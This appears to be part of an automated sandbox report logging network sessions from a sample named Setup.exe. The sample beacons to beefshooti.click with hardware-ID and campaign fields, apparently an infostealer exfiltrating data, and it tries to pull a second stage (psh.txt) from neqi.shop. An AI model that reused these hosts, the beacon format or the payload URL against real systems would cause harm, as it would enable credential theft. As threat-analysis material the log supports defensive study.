2024-12-24 00:12:19 UTC	1369	IN	Data Raw: 35 6d 4c 52 7a 59 4e 6d 6c 6a 71 64 78 2b 4d 75 6c 4c 62 4c 5a 67 33 50 59 6d 46 6d 69 76 5a 39 53 44 67 44 53 33 4c 6a 49 59 69 68 66 55 68 63 55 44 55 52 4b 30 35 54 6f 76 33 41 4d 5a 72 77 78 68 2b 68 76 75 62 51 70 66 71 59 61 35 64 46 63 53 6a 69 7a 53 5a 32 6c 4a 44 54 64 31 4c 76 44 39 53 78 35 68 44 32 43 48 62 62 33 37 49 2b 2f 78 65 6d 62 49 6c 35 31 31 34 6c 2f 2f 65 5a 74 79 63 54 7a 5a 63 6c 46 50 71 4f 52 2b 54 36 77 36 4a 4f 64 74 35 66 6f 6d 34 74 68 37 52 38 54 66 31 57 68 37 35 69 4a 49 77 6e 38 30 63 57 6e 33 78 52 71 77 6f 52 63 79 2f 5a 75 6c 72 31 57 45 78 6a 75 4f 64 54 4a 2b 79 48 72 68 64 4f 49 66 31 78 51 61 4d 78 52 46 6a 56 63 73 48 6a 7a 68 63 32 37 39 44 69 57 58 62 4a 33 36 57 36 2b 70 4d 30 2b 4e 68 72 6b 31 79 6e 50 6a 57 Data Ascii: 5mLRzYNmljqdx+MulLbLZg3PYmFmivZ9SDgDS3LjIYihfUhcUDURK05Tov3AMZrwxh+hvubQpfqYa5dFcSjizSZ2lJDTd1LvD9Sx5hD2CHbb37I+/xembIl5114l//eZtycTzZclFPqOR+T6w6JOdt5fom4th7R8Tf1Wh75iJIwn80cWn3xRqwoRcy/Zulr1WExjuOdTJ+yHrhdOIf1xQaMxRFjVcsHjzhc279DiWXbJ36W6+pM0+Nhrk1ynPjW

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49732	104.21.18.185	443	6596	C:\Users\user\Desktop\Setup.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-24 00:12:20 UTC	274	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=GBWXKW47DF User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 18115 Host: beefshooti.click
2024-12-24 00:12:20 UTC	15331	OUT	Data Raw: 2d 2d 47 42 57 58 4b 57 34 37 44 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 36 45 43 43 32 43 39 41 41 38 46 34 45 38 46 33 30 33 43 37 35 37 41 41 37 31 41 41 38 35 32 0d 0a 2d 2d 47 42 57 58 4b 57 34 37 44 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 47 42 57 58 4b 57 34 37 44 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 6a 4d 77 31 49 45 2d 2d 42 41 52 4e 49 0d 0a 2d 2d 47 42 57 58 4b 57 34 37 44 46 0d 0a 43 6f 6e 74 65 6e 74 2d Data Ascii: --GBWXKW47DFContent-Disposition: form-data; name="hwid"26ECC2C9AA8F4E8F303C757AA71AA852--GBWXKW47DFContent-Disposition: form-data; name="pid"2--GBWXKW47DFContent-Disposition: form-data; name="lid"jMw1IE--BARNI--GBWXKW47DFContent-
2024-12-24 00:12:20 UTC	2784	OUT	Data Raw: c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af a9 da 16 51 bc 21 8f 77 45 11 8f 43 d4 61 11 d5 14 88 8d cc 54 77 94 6d 93 be 93 15 d7 52 9c ab a6 b6 5f Data Ascii: .\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6Q!wECaTwmR_
2024-12-24 00:12:22 UTC	1126	IN	HTTP/1.1 200 OK Date: Tue, 24 Dec 2024 00:12:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=e8v9v7n9e0s9nqqjd3bnoeavpf; expires=Fri, 18 Apr 2025 17:59:00 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nVXwFJ7sssx7J0u5x%2F0wZZJ6qCQJKpC2lF0reWPxK1WAOwyrLsieIUDo5Ko0eheMpIWOlgvx6MFNtonqNl%2FZ5vgTztackQu51E3rOShwoarXFEfR5%2BRQsuHcC4Jb5afQg8Wn"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f6c61182f5c7271-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1842&min_rtt=1832&rtt_var=707&sent=13&recv=22&lost=0&retrans=0&sent_bytes=2841&recv_bytes=19069&delivery_rate=1524804&cwnd=225&unsent_bytes=0&cid=2acc5ed8f643fefc&ts=1298&x=0"
2024-12-24 00:12:22 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-24 00:12:22 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49734	104.21.18.185	443	6596	C:\Users\user\Desktop\Setup.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-24 00:12:23 UTC	275	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=H7H31ZUGFVXU User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8748 Host: beefshooti.click
2024-12-24 00:12:23 UTC	8748	OUT	Data Raw: 2d 2d 48 37 48 33 31 5a 55 47 46 56 58 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 36 45 43 43 32 43 39 41 41 38 46 34 45 38 46 33 30 33 43 37 35 37 41 41 37 31 41 41 38 35 32 0d 0a 2d 2d 48 37 48 33 31 5a 55 47 46 56 58 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 48 37 48 33 31 5a 55 47 46 56 58 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 6a 4d 77 31 49 45 2d 2d 42 41 52 4e 49 0d 0a 2d 2d 48 37 48 33 31 5a 55 47 46 56 58 55 0d 0a Data Ascii: --H7H31ZUGFVXUContent-Disposition: form-data; name="hwid"26ECC2C9AA8F4E8F303C757AA71AA852--H7H31ZUGFVXUContent-Disposition: form-data; name="pid"2--H7H31ZUGFVXUContent-Disposition: form-data; name="lid"jMw1IE--BARNI--H7H31ZUGFVXU
2024-12-24 00:12:24 UTC	1121	IN	HTTP/1.1 200 OK Date: Tue, 24 Dec 2024 00:12:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=6k7jcbepugfqpu1il9oqlft9d2; expires=Fri, 18 Apr 2025 17:59:03 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=16snQzysTMZPYhBbNkFIynHsUI6hLN0JjGz5aAnoJ%2F98mlGOjA9uH6QcYdpgVluuXnd0XKpg7xxgK8KYnYqS8mdXM1V3J4Rr%2FIsY3tyNqwzFH0zrGKxaKlEXWq6NW5k8Uhsd"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f6c61292b027c78-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2010&min_rtt=2000&rtt_var=757&sent=8&recv=14&lost=0&retrans=0&sent_bytes=2842&recv_bytes=9681&delivery_rate=1460000&cwnd=252&unsent_bytes=0&cid=63a0c63881371a70&ts=875&x=0"
2024-12-24 00:12:24 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-24 00:12:24 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49738	104.21.18.185	443	6596	C:\Users\user\Desktop\Setup.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-24 00:12:26 UTC	276	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=B5HRORPDBHHC User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20401 Host: beefshooti.click
2024-12-24 00:12:26 UTC	15331	OUT	Data Raw: 2d 2d 42 35 48 52 4f 52 50 44 42 48 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 36 45 43 43 32 43 39 41 41 38 46 34 45 38 46 33 30 33 43 37 35 37 41 41 37 31 41 41 38 35 32 0d 0a 2d 2d 42 35 48 52 4f 52 50 44 42 48 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 42 35 48 52 4f 52 50 44 42 48 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 6a 4d 77 31 49 45 2d 2d 42 41 52 4e 49 0d 0a 2d 2d 42 35 48 52 4f 52 50 44 42 48 48 43 0d 0a Data Ascii: --B5HRORPDBHHCContent-Disposition: form-data; name="hwid"26ECC2C9AA8F4E8F303C757AA71AA852--B5HRORPDBHHCContent-Disposition: form-data; name="pid"3--B5HRORPDBHHCContent-Disposition: form-data; name="lid"jMw1IE--BARNI--B5HRORPDBHHC
2024-12-24 00:12:26 UTC	5070	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: lrQMn 64F6(X&7~`aO
2024-12-24 00:12:27 UTC	1127	IN	HTTP/1.1 200 OK Date: Tue, 24 Dec 2024 00:12:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=42ge5ul3r235mphihhdhbrf31s; expires=Fri, 18 Apr 2025 17:59:06 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CxsNsX%2BhyvTw8ob8wzwHlUPtd8YAJsczlXkT1mDX9h3cbbpPA1KjBgpnkpRMC3c%2F3WRtnYQy5WJYDwJvwfraNLr6FRNL51e%2FuSkxfoXaYFAE06iVNJE9deloeMWE%2Bemt3Hpf"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f6c613a591e0c76-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1481&min_rtt=1474&rtt_var=567&sent=14&recv=24&lost=0&retrans=0&sent_bytes=2841&recv_bytes=21357&delivery_rate=1907250&cwnd=151&unsent_bytes=0&cid=257318e2d81dc9b0&ts=995&x=0"
2024-12-24 00:12:27 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-24 00:12:27 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49740	104.21.18.185	443	6596	C:\Users\user\Desktop\Setup.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-24 00:12:29 UTC	277	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=2M7NPPXJMWSGOF User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1231 Host: beefshooti.click
2024-12-24 00:12:29 UTC	1231	OUT	Data Raw: 2d 2d 32 4d 37 4e 50 50 58 4a 4d 57 53 47 4f 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 36 45 43 43 32 43 39 41 41 38 46 34 45 38 46 33 30 33 43 37 35 37 41 41 37 31 41 41 38 35 32 0d 0a 2d 2d 32 4d 37 4e 50 50 58 4a 4d 57 53 47 4f 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 32 4d 37 4e 50 50 58 4a 4d 57 53 47 4f 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 6a 4d 77 31 49 45 2d 2d 42 41 52 4e 49 0d 0a 2d 2d 32 4d 37 4e 50 50 58 4a Data Ascii: --2M7NPPXJMWSGOFContent-Disposition: form-data; name="hwid"26ECC2C9AA8F4E8F303C757AA71AA852--2M7NPPXJMWSGOFContent-Disposition: form-data; name="pid"1--2M7NPPXJMWSGOFContent-Disposition: form-data; name="lid"jMw1IE--BARNI--2M7NPPXJ
2024-12-24 00:12:30 UTC	1125	IN	HTTP/1.1 200 OK Date: Tue, 24 Dec 2024 00:12:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=ibc1na03mhm5t1d63ucju6p3n7; expires=Fri, 18 Apr 2025 17:59:08 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HvuBcWLK0o3r9ZV2vR%2BzxvugGBPuPjTqV63ijisRtU3Bwm8f4ORvMaI1APtlHtDCU%2FDD8SbmVQ8bjXfJlGhwBtpNpd6RnVPdgXsEwxc1p0Ck3fJq4%2B9TmPl%2BsTfCLxCKWCYA"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f6c614d7c0b7d16-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=13013&min_rtt=5678&rtt_var=7072&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2841&recv_bytes=2144&delivery_rate=514265&cwnd=217&unsent_bytes=0&cid=e6f77b4548b81c61&ts=815&x=0"
2024-12-24 00:12:30 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-24 00:12:30 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49742	104.21.18.185	443	6596	C:\Users\user\Desktop\Setup.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-24 00:12:31 UTC	272	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=O72ZSG6XG User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1064 Host: beefshooti.click
2024-12-24 00:12:31 UTC	1064	OUT	Data Raw: 2d 2d 4f 37 32 5a 53 47 36 58 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 36 45 43 43 32 43 39 41 41 38 46 34 45 38 46 33 30 33 43 37 35 37 41 41 37 31 41 41 38 35 32 0d 0a 2d 2d 4f 37 32 5a 53 47 36 58 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4f 37 32 5a 53 47 36 58 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 6a 4d 77 31 49 45 2d 2d 42 41 52 4e 49 0d 0a 2d 2d 4f 37 32 5a 53 47 36 58 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 Data Ascii: --O72ZSG6XGContent-Disposition: form-data; name="hwid"26ECC2C9AA8F4E8F303C757AA71AA852--O72ZSG6XGContent-Disposition: form-data; name="pid"1--O72ZSG6XGContent-Disposition: form-data; name="lid"jMw1IE--BARNI--O72ZSG6XGContent-Disp
2024-12-24 00:12:32 UTC	1128	IN	HTTP/1.1 200 OK Date: Tue, 24 Dec 2024 00:12:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=0cm3fjrg6mrqgf3oj0qkv7g475; expires=Fri, 18 Apr 2025 17:59:10 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GVEcslas0OCqNqmqwuW%2FiXq8sORoFSFEwBxEa%2BaTZ4UZ54BiRoLOQtgUG9FhZif4CGdLU8k8LCyk0f4yxd98C%2Bzc4ag9cdq%2BqLlRTPepAAaf%2BIRhY5rRsR8nRexDpo1cU%2B2U"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f6c615aba018c33-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1967&min_rtt=1964&rtt_var=743&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2841&recv_bytes=1972&delivery_rate=1465127&cwnd=245&unsent_bytes=0&cid=fd41f94eaf9751b4&ts=684&x=0"
2024-12-24 00:12:32 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-24 00:12:32 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49743	104.21.18.185	443	6596	C:\Users\user\Desktop\Setup.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-24 00:12:33 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 114 Host: beefshooti.click
2024-12-24 00:12:33 UTC	114	OUT	Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 6a 4d 77 31 49 45 2d 2d 42 41 52 4e 49 26 6a 3d 61 61 37 37 65 37 38 62 36 62 30 64 64 31 62 32 32 32 36 65 37 62 37 39 39 35 33 32 61 62 33 61 26 68 77 69 64 3d 32 36 45 43 43 32 43 39 41 41 38 46 34 45 38 46 33 30 33 43 37 35 37 41 41 37 31 41 41 38 35 32 Data Ascii: act=get_message&ver=4.0&lid=jMw1IE--BARNI&j=aa77e78b6b0dd1b2226e7b799532ab3a&hwid=26ECC2C9AA8F4E8F303C757AA71AA852
2024-12-24 00:12:34 UTC	1130	IN	HTTP/1.1 200 OK Date: Tue, 24 Dec 2024 00:12:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=9sl26kk9djs2j9tss3q38s6n4m; expires=Fri, 18 Apr 2025 17:59:13 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FfmKkpE0QX%2BpU22fL87k%2FwVpESH54ZhBWhKV7oSwydjRqvs%2FifMY%2Fw9cxnuXunDfaH0GL1hhlk0tgQird%2FsEZhJo63XZSk0ndyJl27VOzdXet7hGypXhI2MhrCR1U%2BbVGaGa"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f6c6167894f5e67-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2186&min_rtt=2182&rtt_var=827&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2842&recv_bytes=1015&delivery_rate=1316501&cwnd=243&unsent_bytes=0&cid=c5d618240ffed894&ts=776&x=0"
2024-12-24 00:12:34 UTC	222	IN	Data Raw: 64 38 0d 0a 72 65 39 57 56 4d 64 58 5a 48 5a 4a 43 6a 5a 6b 4f 4b 4c 62 43 4f 66 66 45 4b 32 32 6c 6f 65 34 77 4f 75 63 33 44 6f 42 51 53 62 32 6c 48 51 68 35 57 31 47 48 6a 31 2b 52 68 63 43 2f 76 52 55 79 4c 46 31 33 4e 2b 34 39 4e 43 76 6d 38 44 7a 53 57 55 6d 54 4e 53 61 49 67 6a 6f 4a 78 63 65 5a 33 35 4f 45 42 71 4f 2b 57 36 54 2f 53 71 66 6d 72 54 69 6d 76 72 61 34 66 42 42 49 7a 51 45 6c 38 30 2b 49 4c 4d 6e 46 30 77 56 4a 57 70 4c 55 38 36 79 65 49 53 2b 5a 4d 6a 47 2f 2f 4b 49 37 70 6a 30 73 30 70 64 62 6b 2f 44 6d 77 6b 33 71 79 63 37 47 69 31 34 61 52 64 51 77 2f 56 38 6e 36 73 79 67 5a 54 77 38 35 72 36 32 62 44 2b 58 79 4e 37 46 39 43 79 0d 0a Data Ascii: d8re9WVMdXZHZJCjZkOKLbCOffEK22loe4wOuc3DoBQSb2lHQh5W1GHj1+RhcC/vRUyLF13N+49NCvm8DzSWUmTNSaIgjoJxceZ35OEBqO+W6T/SqfmrTimvra4fBBIzQEl80+ILMnF0wVJWpLU86yeIS+ZMjG//KI7pj0s0pdbk/Dmwk3qyc7Gi14aRdQw/V8n6sygZTw85r62bD+XyN7F9Cy
2024-12-24 00:12:34 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49744	104.21.27.229	443	6596	C:\Users\user\Desktop\Setup.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-24 00:12:35 UTC	199	OUT	GET /sdgjyut/psh.txt HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: neqi.shop
2024-12-24 00:12:36 UTC	940	IN	HTTP/1.1 523 Date: Tue, 24 Dec 2024 00:12:36 GMT Content-Type: text/plain; charset=UTF-8 Content-Length: 15 Connection: close Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0tbTPw2EIJWo3fY7REUC%2BbkUylvcl1EszngRRfNSW80133pX0cQr7JtnqQfHeHScu6hWjDb5kP2XqaoKAtREBJ8nknVlwIyVY2VaRFPurmy6PkgVVKAX9GGOjdg%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Server: cloudflare CF-RAY: 8f6c6175feaf42b8-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=36052&min_rtt=34855&rtt_var=15465&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2819&recv_bytes=813&delivery_rate=65718&cwnd=232&unsent_bytes=0&cid=f598c10dbea7817a&ts=679&x=0"
2024-12-24 00:12:36 UTC	15	IN	Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 35 32 33 Data Ascii: error code: 523

Target ID:	0
Start time:	19:12:04
Start date:	23/12/2024
